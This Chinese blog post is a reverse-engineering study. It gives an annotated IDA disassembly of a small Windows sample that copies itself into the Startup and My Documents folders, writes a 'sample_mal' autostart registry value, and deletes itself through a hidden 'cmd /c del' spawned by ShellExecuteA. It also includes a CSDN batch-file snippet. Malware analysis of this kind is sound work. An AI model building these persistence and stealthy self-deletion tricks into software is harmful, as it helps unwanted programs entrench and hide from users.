(很久以前的学习记录,放到博客上来)
(IDA5.0版的不知道为何反汇编进去每一行被截断的景象,惨不忍睹......明明是个正版的。只好回来用拷过来的破解版,依然有一些叽里呱啦的问题,懒得管了,勉强能用。)
之前的一个拷贝自身到C盘下,并删除自身的exe文件(Reverse 01 中的),拖到IDA里反汇编:
.text:00401000 ; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
; ---------------------------------------------------------------------------
; WinMain (IDA listing of compiler output; /GS stack cookie kept in var_4).
; 1. Gate: builds "<CSIDL 7 folder>\0.exe" and lstrcmp's it against its own
;    module path.  If the two DIFFER and that file already EXISTS, WinMain
;    returns 0 at once - no window, nothing else runs (a copy is already
;    installed).  If this process IS that copy, or no copy exists yet, go on.
; 2. Ordinary Win32 skeleton: LoadStringA x2, sub_4011A0 (RegisterClassExA
;    with lpfnWndProc = sub_401380), CreateWindowExA, accelerator/message
;    loop, return Msg.wParam.
; The copy-to-special-folders / registry / self-delete logic is NOT in this
; function; it is reached from the window procedure sub_401380.
; NOTE(review): CSIDL 7 is CSIDL_STARTUP (per-user Startup folder) in
; shlobj.h - confirm against the SDK used.  The return value of
; SHGetSpecialFolderPathA is never checked, so pszPath may be empty/stale.
; ---------------------------------------------------------------------------
.text:00401000 _WinMain@16 proc near ; CODE XREF: ___tmainCRTStartup+14Bp
.text:00401000
.text:00401000 Msg = tagMSG ptr -820h ; MSG used by the message loop
.text:00401000 Filename = byte ptr -804h ; own module path, 0x400 bytes
.text:00401000 pszPath = byte ptr -404h ; "<special folder>\0.exe", 0x400 bytes
.text:00401000 var_4 = dword ptr -4 ; /GS stack cookie (cookie ^ ebp)
.text:00401000 hInstance = dword ptr 8
.text:00401000 hPrevInstance = dword ptr 0Ch
.text:00401000 lpCmdLine = dword ptr 10h
.text:00401000 nShowCmd = dword ptr 14h
.text:00401000
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 sub esp, 820h ; locals: MSG + two 0x400-byte path buffers + cookie
.text:00401009 mov eax, ___security_cookie
.text:0040100E xor eax, ebp
.text:00401010 mov [ebp+var_4], eax ; store cookie; verified before every retn below
.text:00401013 push esi
.text:00401014 mov esi, [ebp+hInstance] ; esi = hInstance for the whole function
.text:00401017 push 400h ; nSize (matches the 0x400-byte Filename buffer)
.text:0040101C lea eax, [ebp+Filename]
.text:00401022 push eax ; lpFilename
.text:00401023 push 0 ; hModule (NULL = this executable)
.text:00401025 call ds:GetModuleFileNameA ; Filename = full path of the running exe
.text:0040102B push 0 ; fCreate
.text:0040102D push 7 ; csidl (7 = CSIDL_STARTUP)
.text:0040102F lea ecx, [ebp+pszPath]
.text:00401035 push ecx ; pszPath
.text:00401036 push 0 ; hwnd
.text:00401038 call ds:SHGetSpecialFolderPathA ; pszPath = Startup folder (result unchecked)
.text:0040103E push offset String2 ; "\\0.exe"
.text:00401043 lea edx, [ebp+pszPath]
.text:00401049 push edx ; lpString1
.text:0040104A call ds:lstrcatA ; pszPath += "\0.exe" (unbounded; 0x400 > MAX_PATH so safe here)
.text:00401050 lea eax, [ebp+Filename]
.text:00401056 push eax ; lpString2
.text:00401057 lea ecx, [ebp+pszPath]
.text:0040105D push ecx ; lpString1
.text:0040105E call ds:lstrcmpA ; case-sensitive compare: is this process the Startup copy?
.text:00401064 test eax, eax
.text:00401066 jz short loc_40108C ; equal -> we ARE <Startup>\0.exe: run normally
.text:00401068 lea edx, [ebp+pszPath]
.text:0040106E push edx ; pszPath
.text:0040106F call ds:PathFileExistsA ; not the copy: does <Startup>\0.exe already exist?
.text:00401075 test eax, eax
.text:00401077 jz short loc_40108C ; no copy yet -> run normally (sub_401380 will create it)
.text:00401079 xor eax, eax ; copy already installed -> return 0 silently (epilogue follows)
.text:0040107B pop esi
.text:0040107C mov ecx, [ebp+var_4]
.text:0040107F xor ecx, ebp
.text:00401081 call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:00401086 mov esp, ebp
.text:00401088 pop ebp
.text:00401089 retn 10h ; stdcall, 4 dword args
.text:0040108C ; ---------------------------------------------------------------------------
.text:0040108C
.text:0040108C loc_40108C: ; CODE XREF: WinMain(x,x,x,x)+66j
.text:0040108C ; WinMain(x,x,x,x)+77j
.text:0040108C push edi
.text:0040108D mov edi, ds:LoadStringA
.text:00401093 push 64h ; cchBufferMax
.text:00401095 push offset WindowName ; lpBuffer
.text:0040109A push 67h ; uID (string resource 103 -> WindowName)
.text:0040109C push esi ; hInstance
.text:0040109D call edi ; LoadStringA
.text:0040109F push 64h ; cchBufferMax
.text:004010A1 push offset ClassName ; lpBuffer
.text:004010A6 push 6Dh ; uID (string resource 109 -> ClassName)
.text:004010A8 push esi ; hInstance
.text:004010A9 call edi ; LoadStringA
.text:004010AB mov eax, esi ; hInstance is handed over in EAX (non-standard convention, see sub_4011A0)
.text:004010AD call sub_4011A0 ; RegisterClassExA(..., lpfnWndProc = sub_401380); ATOM ignored
.text:004010B2 push 0 ; lpParam
.text:004010B4 push esi ; hInstance
.text:004010B5 push 0 ; hMenu
.text:004010B7 push 0 ; hWndParent
.text:004010B9 push 64h ; nHeight
.text:004010BB push 0C8h ; nWidth
.text:004010C0 push 64h ; Y
.text:004010C2 push 0C8h ; X
.text:004010C7 push 0CF0000h ; dwStyle (WS_OVERLAPPEDWINDOW)
.text:004010CC push offset WindowName ; lpWindowName
.text:004010D1 push offset ClassName ; lpClassName
.text:004010D6 push 0 ; dwExStyle
.text:004010D8 mov hInstance, esi ; also cache hInstance in the global
.text:004010DE call ds:CreateWindowExA
.text:004010E4 mov edi, eax ; edi = hWnd
.text:004010E6 test edi, edi
.text:004010E8 jz loc_40118B ; CreateWindowExA failed -> return 0
.text:004010EE mov eax, [ebp+nShowCmd]
.text:004010F1 push eax ; nCmdShow
.text:004010F2 push edi ; hWnd
.text:004010F3 call ds:ShowWindow
.text:004010F9 push edi ; hWnd
.text:004010FA call ds:UpdateWindow
.text:00401100 push 6Dh ; lpTableName (MAKEINTRESOURCE(109))
.text:00401102 push esi ; hInstance
.text:00401103 call ds:LoadAcceleratorsA
.text:00401109 mov edi, ds:GetMessageA ; edi now = GetMessageA (hWnd no longer needed)
.text:0040110F push 0 ; wMsgFilterMax
.text:00401111 push 0 ; wMsgFilterMin
.text:00401113 push 0 ; hWnd
.text:00401115 lea ecx, [ebp+Msg]
.text:0040111B push ecx ; lpMsg
.text:0040111C mov esi, eax ; esi = hAccTable (result of LoadAcceleratorsA)
.text:0040111E call edi ; GetMessageA
.text:00401120 test eax, eax
.text:00401122 jz short loc_401173 ; 0 = WM_QUIT -> leave; -1 (error) is NOT distinguished and keeps looping
.text:00401124 push ebx
.text:00401125 mov ebx, ds:TranslateAcceleratorA
.text:0040112B jmp short loc_401130
.text:0040112B ; ---------------------------------------------------------------------------
.text:0040112D align 10h
.text:00401130
.text:00401130 loc_401130: ; CODE XREF: WinMain(x,x,x,x)+12Bj
.text:00401130 ; WinMain(x,x,x,x)+170j
.text:00401130 mov eax, [ebp+Msg.hwnd]
.text:00401136 lea edx, [ebp+Msg]
.text:0040113C push edx ; lpMsg
.text:0040113D push esi ; hAccTable
.text:0040113E push eax ; hWnd
.text:0040113F call ebx ; TranslateAcceleratorA
.text:00401141 test eax, eax
.text:00401143 jnz short loc_40115F ; accelerator consumed the message -> skip Translate/Dispatch
.text:00401145 lea ecx, [ebp+Msg]
.text:0040114B push ecx ; lpMsg
.text:0040114C call ds:TranslateMessage
.text:00401152 lea edx, [ebp+Msg]
.text:00401158 push edx ; lpMsg
.text:00401159 call ds:DispatchMessageA ; routes to sub_401380 for this window
.text:0040115F
.text:0040115F loc_40115F: ; CODE XREF: WinMain(x,x,x,x)+143j
.text:0040115F push 0 ; wMsgFilterMax
.text:00401161 push 0 ; wMsgFilterMin
.text:00401163 push 0 ; hWnd
.text:00401165 lea eax, [ebp+Msg]
.text:0040116B push eax ; lpMsg
.text:0040116C call edi ; GetMessageA
.text:0040116E test eax, eax
.text:00401170 jnz short loc_401130 ; loop until GetMessageA returns 0 (WM_QUIT)
.text:00401172 pop ebx
.text:00401173
.text:00401173 loc_401173: ; CODE XREF: WinMain(x,x,x,x)+122j
.text:00401173 mov eax, [ebp+Msg.wParam] ; exit code supplied by PostQuitMessage
.text:00401179 pop edi
.text:0040117A pop esi
.text:0040117B mov ecx, [ebp+var_4]
.text:0040117E xor ecx, ebp
.text:00401180 call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:00401185 mov esp, ebp
.text:00401187 pop ebp
.text:00401188 retn 10h
.text:0040118B ; ---------------------------------------------------------------------------
.text:0040118B
.text:0040118B loc_40118B: ; CODE XREF: WinMain(x,x,x,x)+E8j
.text:0040118B mov ecx, [ebp+var_4] ; CreateWindowExA failure path: return 0
.text:0040118E pop edi
.text:0040118F xor ecx, ebp
.text:00401191 xor eax, eax
.text:00401193 pop esi
.text:00401194 call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:00401199 mov esp, ebp
.text:0040119B pop ebp
.text:0040119C retn 10h
.text:0040119C _WinMain@16 endp
.text:0040119C
.text:0040119C ; ---------------------------------------------------------------------------
.text:0040119F align 10h
.text:004011A0
.text:004011A0 ; =============== S U B R O U T I N E =======================================
.text:004011A0
.text:004011A0 ; Attributes: bp-based frame
.text:004011A0
.text:004011A0 sub_4011A0 proc near ; CODE XREF: WinMain(x,x,x,x)+ADp
; Registers the window class via RegisterClassExA.
; Non-standard calling convention: hInstance arrives in EAX (WinMain does
; "mov eax, esi" right before the call); the ATOM returned by
; RegisterClassExA is left in EAX as this function's return value.
; WNDCLASSEXA filled on the stack: style 3 = CS_VREDRAW|CS_HREDRAW,
; lpfnWndProc = sub_401380 (this is how the copy/registry/self-delete code
; gets reached), icons from resources 0x6B/0x6C, cursor 0x7F00 = IDC_ARROW,
; hbrBackground 6 = COLOR_WINDOW+1, menu resource 0x6D, class name ClassName.
; Failures of LoadIconA/LoadCursorA/RegisterClassExA are not checked.
.text:004011A0
.text:004011A0 var_30 = WNDCLASSEXA ptr -30h
.text:004011A0
.text:004011A0 push ebp
.text:004011A1 mov ebp, esp
.text:004011A3 sub esp, 30h ; sizeof(WNDCLASSEXA) == 0x30
.text:004011A6 push esi
.text:004011A7 mov esi, ds:LoadIconA
.text:004011AD push 6Bh ; lpIconName (MAKEINTRESOURCE(107))
.text:004011AF push eax ; hInstance
.text:004011B0 mov [ebp+var_30.cbSize], 30h
.text:004011B7 mov [ebp+var_30.style], 3 ; CS_VREDRAW | CS_HREDRAW
.text:004011BE mov [ebp+var_30.lpfnWndProc], offset sub_401380 ; window procedure
.text:004011C5 mov [ebp+var_30.cbClsExtra], 0
.text:004011CC mov [ebp+var_30.cbWndExtra], 0
.text:004011D3 mov [ebp+var_30.hInstance], eax
.text:004011D6 call esi ; LoadIconA
.text:004011D8 push 7F00h ; lpCursorName (IDC_ARROW)
.text:004011DD push 0 ; hInstance (NULL = system cursor)
.text:004011DF mov [ebp+var_30.hIcon], eax
.text:004011E2 call ds:LoadCursorA
.text:004011E8 mov [ebp+var_30.hCursor], eax
.text:004011EB mov eax, [ebp+var_30.hInstance] ; reload hInstance (eax was clobbered by the calls)
.text:004011EE push 6Ch ; lpIconName (MAKEINTRESOURCE(108), small icon)
.text:004011F0 push eax ; hInstance
.text:004011F1 mov [ebp+var_30.hbrBackground], 6 ; COLOR_WINDOW + 1
.text:004011F8 mov [ebp+var_30.lpszMenuName], 6Dh ; MAKEINTRESOURCE(109)
.text:004011FF mov [ebp+var_30.lpszClassName], offset ClassName
.text:00401206 call esi ; LoadIconA
.text:00401208 lea ecx, [ebp+var_30]
.text:0040120B push ecx ; WNDCLASSEXA *
.text:0040120C mov [ebp+var_30.hIconSm], eax
.text:0040120F call ds:RegisterClassExA ; ATOM (0 on failure) stays in eax as the return value
.text:00401215 pop esi
.text:00401216 mov esp, ebp
.text:00401218 pop ebp
.text:00401219 retn
.text:00401219 sub_4011A0 endp
.text:00401219
.text:00401219 ; ---------------------------------------------------------------------------
.text:0040121A align 10h
.text:00401220
.text:00401220 ; =============== S U B R O U T I N E =======================================
.text:00401220
.text:00401220 ; Attributes: bp-based frame
.text:00401220
.text:00401220 sub_401220 proc near ; CODE XREF: sub_401380+DAp
; Self-delete.  Equivalent to:
;   ShellExecuteA(NULL, NULL, %ComSpec%, "/c del <own 8.3 path> >> NUL", NULL, SW_HIDE)
; Steps: GetModuleFileNameA(NULL) -> own full path; GetShortPathNameA in
; place (the 8.3 form contains no spaces, so the del argument needs no
; quoting); build the parameter string with lstrcpyA/lstrcatA; read ComSpec
; (cmd.exe) into the Filename buffer, which is reused; launch it hidden.
; Returns 1 if ShellExecuteA reported success (> 32), 0 on any failure.
; The caller (sub_401380, 0040145A) ignores the result and calls
; PostQuitMessage immediately afterwards.
; Why this deletes a running exe: cmd.exe is a separate process, so this
; process's own file lock does not stop it; the del runs after this process
; has exited.  It is a race - if cmd.exe reaches "del" before the exit,
; the delete fails and nothing reports it (console is SW_HIDE).
; NOTE(review): String1 is 0x104 bytes and receives 7 + strlen(short path)
; + 7 + 1 bytes with no bound check; a short path longer than 0xF6 chars
; would overrun into Filename (and the /GS cookie beyond it).  Unlikely
; with 8.3 paths, but unchecked.
.text:00401220
.text:00401220 String1 = byte ptr -20Ch ; "/c del <path> >> NUL", 0x104 bytes
.text:00401220 Filename = byte ptr -108h ; own path, then reused for %ComSpec%, 0x104 bytes
.text:00401220 var_4 = dword ptr -4 ; /GS stack cookie
.text:00401220
.text:00401220 push ebp
.text:00401221 mov ebp, esp
.text:00401223 sub esp, 20Ch
.text:00401229 mov eax, ___security_cookie
.text:0040122E xor eax, ebp
.text:00401230 mov [ebp+var_4], eax
.text:00401233 push 104h ; nSize (MAX_PATH)
.text:00401238 lea eax, [ebp+Filename]
.text:0040123E push eax ; lpFilename
.text:0040123F push 0 ; hModule (NULL = this executable)
.text:00401241 call ds:GetModuleFileNameA ; Filename = own full path
.text:00401247 test eax, eax
.text:00401249 jz loc_4012F3 ; failed -> return 0
.text:0040124F push 104h ; cchBuffer
.text:00401254 lea ecx, [ebp+Filename]
.text:0040125A push ecx ; lpszShortPath
.text:0040125B mov edx, ecx
.text:0040125D push edx ; lpszLongPath (same buffer: converted in place)
.text:0040125E call ds:GetShortPathNameA ; -> 8.3 path, no spaces => no quotes needed
.text:00401264 test eax, eax
.text:00401266 jz loc_4012F3 ; failed -> return 0
.text:0040126C push esi
.text:0040126D push offset aCDel ; "/c del "
.text:00401272 lea eax, [ebp+String1]
.text:00401278 push eax ; lpString1
.text:00401279 call ds:lstrcpyA ; String1 = "/c del "
.text:0040127F mov esi, ds:lstrcatA
.text:00401285 lea ecx, [ebp+Filename]
.text:0040128B push ecx ; lpString2
.text:0040128C lea edx, [ebp+String1]
.text:00401292 push edx ; lpString1
.text:00401293 call esi ; lstrcatA ; String1 += <own short path>
.text:00401295 push offset aNul ; " >> NUL"
.text:0040129A lea eax, [ebp+String1]
.text:004012A0 push eax ; lpString1
.text:004012A1 call esi ; lstrcatA ; String1 += " >> NUL" (discards stdout only; del errors go to stderr)
.text:004012A3 push 104h ; nSize
.text:004012A8 lea ecx, [ebp+Filename]
.text:004012AE push ecx ; lpBuffer (Filename is reused for the ComSpec value)
.text:004012AF push offset Name ; "ComSpec"
.text:004012B4 call ds:GetEnvironmentVariableA ; Filename = path of cmd.exe
.text:004012BA pop esi
.text:004012BB test eax, eax
.text:004012BD jz short loc_4012F3 ; ComSpec not set -> return 0
.text:004012BF push 0 ; nShowCmd (0 = SW_HIDE: no console window flashes)
.text:004012C1 push 0 ; lpDirectory
.text:004012C3 lea edx, [ebp+String1]
.text:004012C9 push edx ; lpParameters ("/c del <path> >> NUL")
.text:004012CA lea eax, [ebp+Filename]
.text:004012D0 push eax ; lpFile (cmd.exe)
.text:004012D1 push 0 ; lpOperation (default verb)
.text:004012D3 push 0 ; hwnd
.text:004012D5 call ds:ShellExecuteA ; spawn cmd.exe - this is the actual self-delete
.text:004012DB cmp eax, 20h
.text:004012DE jle short loc_4012F3 ; ShellExecuteA returns <= 32 on error
.text:004012E0 mov eax, 1 ; success
.text:004012E5 mov ecx, [ebp+var_4]
.text:004012E8 xor ecx, ebp
.text:004012EA call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:004012EF mov esp, ebp
.text:004012F1 pop ebp
.text:004012F2 retn
.text:004012F3 ; ---------------------------------------------------------------------------
.text:004012F3
.text:004012F3 loc_4012F3: ; CODE XREF: sub_401220+29j
.text:004012F3 ; sub_401220+46j ...
.text:004012F3 mov ecx, [ebp+var_4]
.text:004012F6 xor ecx, ebp
.text:004012F8 xor eax, eax ; failure -> return 0
.text:004012FA call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:004012FF mov esp, ebp
.text:00401301 pop ebp
.text:00401302 retn
.text:00401302 sub_401220 endp
.text:00401302
.text:00401302 ; ---------------------------------------------------------------------------
.text:00401303 align 10h
.text:00401310
.text:00401310 ; =============== S U B R O U T I N E =======================================
.text:00401310
.text:00401310 ; Attributes: bp-based frame
.text:00401310
.text:00401310 ; int __cdecl sub_401310(BYTE *lpData, DWORD cbData)
; Persistence helper: stores lpData (cbData bytes) as a REG_SZ value named
; "sample_mal" under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVe...
; (the subkey string is truncated in this listing - check the Strings window;
; from the prefix it is presumably a CurrentVersion\Run-style autostart key,
; TODO confirm).  Flow: RegCreateKeyExA(KEY_ALL_ACCESS) -> RegSetValueExA ->
; RegCloseKey.  Returns 1 only if RegSetValueExA succeeded, else 0; the
; caller (sub_401380, 00401452) ignores the result.
; Notes: writing under HKLM needs administrative rights - as a limited user
; RegCreateKeyExA fails and this silently returns 0.  The caller passes
; strlen(pszPath) as cbData (0040143C-0040144C), i.e. WITHOUT the terminating
; NUL, although RegSetValueEx documents that cbData for REG_SZ should
; include it.
.text:00401310 sub_401310 proc near ; CODE XREF: sub_401380+D2p
.text:00401310
.text:00401310 dwDisposition = dword ptr -8 ; created-vs-opened flag, never read
.text:00401310 phkResult = dword ptr -4 ; HKEY of the created/opened key
.text:00401310 lpData = dword ptr 8
.text:00401310 cbData = dword ptr 0Ch
.text:00401310
.text:00401310 push ebp
.text:00401311 mov ebp, esp
.text:00401313 sub esp, 8
.text:00401316 push esi
.text:00401317 lea eax, [ebp+dwDisposition]
.text:0040131A push eax ; lpdwDisposition
.text:0040131B xor esi, esi ; esi = 0: source of NULL args and the default return value
.text:0040131D lea ecx, [ebp+phkResult]
.text:00401320 push ecx ; phkResult
.text:00401321 push esi ; lpSecurityAttributes (NULL)
.text:00401322 push 0F003Fh ; samDesired (KEY_ALL_ACCESS)
.text:00401327 push esi ; dwOptions (0 = REG_OPTION_NON_VOLATILE)
.text:00401328 push offset Class ; lpClass
.text:0040132D push esi ; Reserved
.text:0040132E push offset SubKey ; "Software\\Microsoft\\Windows\\CurrentVe"...
.text:00401333 push 80000002h ; hKey (HKEY_LOCAL_MACHINE)
.text:00401338 mov [ebp+phkResult], esi
.text:0040133B call ds:RegCreateKeyExA
.text:00401341 test eax, eax
.text:00401343 jnz short loc_401370 ; ERROR_SUCCESS == 0; anything else -> return 0, no key to close
.text:00401345 mov edx, [ebp+cbData]
.text:00401348 mov eax, [ebp+lpData]
.text:0040134B mov ecx, [ebp+phkResult]
.text:0040134E push edx ; cbData
.text:0040134F push eax ; lpData
.text:00401350 push 1 ; dwType (REG_SZ)
.text:00401352 push esi ; Reserved
.text:00401353 push offset ValueName ; "sample_mal"
.text:00401358 push ecx ; hKey
.text:00401359 call ds:RegSetValueExA
.text:0040135F test eax, eax
.text:00401361 jnz short loc_401366 ; failed -> keep esi == 0
.text:00401363 lea esi, [eax+1] ; eax == 0 here, so esi = 1 (success)
.text:00401366
.text:00401366 loc_401366: ; CODE XREF: sub_401310+51j
.text:00401366 mov edx, [ebp+phkResult]
.text:00401369 push edx ; hKey
.text:0040136A call ds:RegCloseKey
.text:00401370
.text:00401370 loc_401370: ; CODE XREF: sub_401310+33j
.text:00401370 mov eax, esi ; return 1 on success, 0 otherwise
.text:00401372 pop esi
.text:00401373 mov esp, ebp
.text:00401375 pop ebp
.text:00401376 retn
.text:00401376 sub_401310 endp
.text:00401376
.text:00401376 ; ---------------------------------------------------------------------------
.text:00401377 align 10h
.text:00401380
.text:00401380 ; =============== S U B R O U T I N E =======================================
.text:00401380
.text:00401380 ; Attributes: bp-based frame
.text:00401380
.text:00401380 ; int __stdcall sub_401380(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
.text:00401380 sub_401380 proc near ; DATA XREF: sub_4011A0+1Eo
.text:00401380
.text:00401380 Paint = tagPAINTSTRUCT ptr -848h
.text:00401380 pszPath = byte ptr -808h
.text:00401380 Filename = byte ptr -408h
.text:00401380 var_4 = dword ptr -4
.text:00401380 hWnd = dword ptr 8
.text:00401380 Msg = dword ptr 0Ch
.text:00401380 wParam = dword ptr 10h
.text:00401380 lParam = dword ptr 14h
.text:00401380
.text:00401380 push ebp
.text:00401381 mov ebp, esp
.text:00401383 and esp, 0FFFFFFF8h
.text:00401386 sub esp, 84Ch
.text:0040138C mov eax, ___security_cookie
.text:00401391 xor eax, esp
.text:00401393 mov [esp+84Ch+var_4], eax
.text:0040139A mov eax, [ebp+Msg]
.text:0040139D push ebx
.text:0040139E push esi
.text:0040139F mov esi, [ebp+hWnd]
.text:004013A2 push edi
.text:004013A3 cmp eax, 0Fh
.text:004013A6 ja loc_40149B
.text:004013AC jz loc_40146C
.text:004013B2 mov ecx, eax
.text:004013B4 dec ecx
.text:004013B5 jz loc_40151F
.text:004013BB dec ecx
.text:004013BC jnz loc_4014A2
.text:004013C2 push 400h ; nSize
.text:004013C7 lea eax, [esp+85Ch+Filename]
.text:004013CE push eax ; lpFilename
.text:004013CF push ecx ; hModule
.text:004013D0 call ds:GetModuleFileNameA
.text:004013D6 mov esi, ds:SHGetSpecialFolderPathA
.text:004013DC push 0 ; fCreate
.text:004013DE push 7 ; csidl
.text:004013E0 lea ecx, [esp+860h+pszPath]
.text:004013E4 push ecx ; pszPath
.text:004013E5 push 0 ; hwnd
.text:004013E7 call esi ; SHGetSpecialFolderPathA
.text:004013E9 mov edi, ds:lstrcatA
.text:004013EF push offset String2 ; "\\0.exe"
.text:004013F4 lea edx, [esp+85Ch+pszPath]
.text:004013F8 push edx ; lpString1
.text:004013F9 call edi ; lstrcatA
.text:004013FB mov ebx, ds:CopyFileA
.text:00401401 push 0 ; bFailIfExists
.text:00401403 lea eax, [esp+85Ch+pszPath]
.text:00401407 push eax ; lpNewFileName
.text:00401408 lea ecx, [esp+860h+Filename]
.text:0040140F push ecx ; lpExistingFileName
.text:00401410 call ebx ; CopyFileA
.text:00401412 push 0 ; fCreate
.text:00401414 push 5 ; csidl
.text:00401416 lea edx, [esp+860h+pszPath]
.text:0040141A push edx ; pszPath
.text:0040141B push 0 ; hwnd
.text:0040141D call esi ; SHGetSpecialFolderPathA
.text:0040141F push offset a1_exe ; "\\1.exe"
.text:00401424 lea eax, [esp+85Ch+pszPath]
.text:00401428 push eax ; lpString1
.text:00401429 call edi ; lstrcatA
.text:0040142B push 0 ; bFailIfExists
.text:0040142D lea ecx, [esp+85Ch+pszPath]
.text:00401431 push ecx ; lpNewFileName
.text:00401432 lea edx, [esp+860h+Filename]
.text:00401439 push edx ; lpExistingFileName
.text:0040143A call ebx ; CopyFileA
.text:0040143C lea eax, [esp+858h+pszPath]
.text:00401440 lea edx, [eax+1]
.text:00401443
.text:00401443 loc_401443: ; CODE XREF: sub_401380+C8j
.text:00401443 mov cl, [eax]
.text:00401445 inc eax
.text:00401446 test cl, cl
.text:00401448 jnz short loc_401443
.text:0040144A sub eax, edx
.text:0040144C push eax ; cbData
.text:0040144D lea eax, [esp+85Ch+pszPath]
.text:00401451 push eax ; lpData
.text:00401452 call sub_401310
.text:00401457 add esp, 8
.text:0040145A call sub_401220
.text:0040145F push 0 ; nExitCode
.text:00401461 call ds:PostQuitMessage
.text:00401467 jmp loc_40151F
.text:0040146C ; ---------------------------------------------------------------------------
我是想要找到exe文件执行后如何把自身给删除的。反汇编出来的代码远不止粘出来的这么长,这里只截取一部分。不过其实不必大海捞针:sub_4011A0 在 004011BE 把 sub_401380 填进 lpfnWndProc,所以 sub_401380 就是窗口过程;它开头对 Msg 的分支(cmp eax, 0Fh / dec ecx / dec ecx)说明只有 Msg == 2(WM_DESTROY,也就是用户关闭窗口时)才会走到 004013C2 之后这段代码——先把自身拷到 CSIDL 7(Startup 启动目录)下的 0.exe 和 CSIDL 5(我的文档)下的 1.exe,再调 sub_401310 把 1.exe 的路径作为 "sample_mal" 值写进 HKLM\Software\Microsoft\Windows\CurrentVe...(IDA 把字符串截断了,需要在 Strings 窗口确认;从前缀看很可能是 CurrentVersion\Run 一类的自启动键),然后 0040145A call sub_401220 删除自身,最后 PostQuitMessage。顺着 "/c del" 这个字符串或 ShellExecuteA 的交叉引用(Ctrl+X)可以直接定位到 sub_401220。
进去sub_401220:
.text:00401220 sub_401220 proc near ; CODE XREF: sub_401380+DAp
.text:00401220
.text:00401220 String1 = byte ptr -20Ch
.text:00401220 Filename = byte ptr -108h
.text:00401220 var_4 = dword ptr -4
.text:00401220
.text:00401220 push ebp
.text:00401221 mov ebp, esp
.text:00401223 sub esp, 20Ch
.text:00401229 mov eax, ___security_cookie
.text:0040122E xor eax, ebp
.text:00401230 mov [ebp+var_4], eax
.text:00401233 push 104h ; nSize
.text:00401238 lea eax, [ebp+Filename]
.text:0040123E push eax ; lpFilename
.text:0040123F push 0 ; hModule
.text:00401241 call ds:GetModuleFileNameA
.text:00401247 test eax, eax
.text:00401249 jz loc_4012F3
.text:0040124F push 104h ; cchBuffer
.text:00401254 lea ecx, [ebp+Filename]
.text:0040125A push ecx ; lpszShortPath
.text:0040125B mov edx, ecx
.text:0040125D push edx ; lpszLongPath
.text:0040125E call ds:GetShortPathNameA
.text:00401264 test eax, eax
.text:00401266 jz loc_4012F3
.text:0040126C push esi
.text:0040126D push offset aCDel ; "/c del "
.text:00401272 lea eax, [ebp+String1]
.text:00401278 push eax ; lpString1
.text:00401279 call ds:lstrcpyA
.text:0040127F mov esi, ds:lstrcatA
.text:00401285 lea ecx, [ebp+Filename]
.text:0040128B push ecx ; lpString2
.text:0040128C lea edx, [ebp+String1]
.text:00401292 push edx ; lpString1
.text:00401293 call esi ; lstrcatA
.text:00401295 push offset aNul ; " >> NUL"
.text:0040129A lea eax, [ebp+String1]
.text:004012A0 push eax ; lpString1
.text:004012A1 call esi ; lstrcatA
.text:004012A3 push 104h ; nSize
.text:004012A8 lea ecx, [ebp+Filename]
.text:004012AE push ecx ; lpBuffer
.text:004012AF push offset Name ; "ComSpec"
.text:004012B4 call ds:GetEnvironmentVariableA
.text:004012BA pop esi
.text:004012BB test eax, eax
.text:004012BD jz short loc_4012F3
.text:004012BF push 0 ; nShowCmd
.text:004012C1 push 0 ; lpDirectory
.text:004012C3 lea edx, [ebp+String1]
.text:004012C9 push edx ; lpParameters
.text:004012CA lea eax, [ebp+Filename]
.text:004012D0 push eax ; lpFile
.text:004012D1 push 0 ; lpOperation
.text:004012D3 push 0 ; hwnd
.text:004012D5 call ds:ShellExecuteA
.text:004012DB cmp eax, 20h
.text:004012DE jle short loc_4012F3
.text:004012E0 mov eax, 1
.text:004012E5 mov ecx, [ebp+var_4]
.text:004012E8 xor ecx, ebp
.text:004012EA call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:004012EF mov esp, ebp
.text:004012F1 pop ebp
.text:004012F2 retn
GetModuleFileNameA、GetShortPathNameA 其实也是关键的一环:前者(hModule 为 0)取得当前 exe 自己的完整路径,后者把它就地转成 8.3 短路径——短路径里没有空格,拼进 del 命令时就不用加引号。随后从 00401272 起用 lstrcpyA/lstrcatA 拼出参数串 "/c del <短路径> >> NUL",再用 GetEnvironmentVariableA("ComSpec") 取得 cmd.exe 的路径(复用 Filename 缓冲区),最后 004012D5 call ds:ShellExecuteA 以 nShowCmd = 0(SW_HIDE)启动 cmd.exe 执行这条 del;返回值大于 32(cmp eax, 20h)才算成功。
百度查了一下exe文件删除自身的方法,CSDN上确实有谈论过,也有人指出用ShellExecute可以实现。用了其上的代码,并没有实现删除exe本身,只是闪现了黑窗口(打开后关闭了黑窗口)。对照上面的反汇编,这个样本删除自身并不是靠 C 盘下的副本来删,而就是 sub_401220 自己完成的:cmd.exe 是另一个进程,不受本进程对 exe 文件占用的影响;调用方 sub_401380 在 0040145A call sub_401220 之后马上 PostQuitMessage(0040145F)退出,正常情况下本进程先结束、cmd.exe 随后才执行到 del,文件就被删掉了(本质上这是一个竞争:如果 del 在进程退出前执行,删除会失败,而且没有任何提示,>> NUL 只是吞掉了输出)。CSDN 代码失败的原因更可能是:它用的是相对路径 "1.exe"/"1.bat"(依赖当前目录,并且要求 exe 恰好叫 1.exe),而样本用的是 GetModuleFileNameA 取回的自身完整路径;黑窗口闪现则是因为传了 SW_SHOWNORMAL,样本传的是 SW_HIDE(0)。
附CSDN上的代码(并未实现删除exe本身) :
#include <windows.h>
#include <fstream>
using namespace std;
int main()
{
ofstream file;
file.open("1.bat");
file<<"del 1.exe"<<endl;
file<<"del 1.bat"<<endl;
file.close();
ShellExecute(NULL,"open","1.bat","",NULL,SW_SHOWNORMAL);